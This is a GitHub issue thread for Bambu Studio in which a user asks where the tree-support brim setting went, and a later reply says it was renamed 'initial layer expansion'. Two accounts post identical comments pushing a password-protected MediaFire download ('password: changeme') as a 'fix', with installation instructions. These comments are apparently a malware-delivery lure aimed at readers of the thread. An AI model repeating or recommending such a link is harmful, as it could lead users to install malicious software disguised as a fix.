bambulab/BambuStudio #4724: Tree brim setting has disappeared?

cyanidesugar, 2024-08-31:
### Bambu Studio Version

1.9.5.51

### Where is the application from?

Bambu Lab github releases

### OS version

Windows 11

### Additional system information

AMD 5700X CPU
nVidia 2080 Super GPU

### Printer

Bambu Lab P series (both)

### How to reproduce

Go to Support in Settings
Select 'Tree (Auto)'
Try to locate setting to set brim for Tree Supports (this used to be available for some tree supports, not organic, but now it's gone from all tree supports.). 

### Actual results

[image]
[image]

### Expected results

I want to be able to set the brim settings on tree supports.

### Project file & Debug log uploads

[Bat Wing Bookend (No Infill).zip](https://github.com/user-attachments/files/16823693/Bat.Wing.Bookend.No.Infill.zip)

### Checklist of files to include

- [ ] Log file
- [X] Project file

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

tangketan, 2024-09-02:
The name has been changed to "initial layer expansion", because it's not just for tree support, but for all supports including normal support.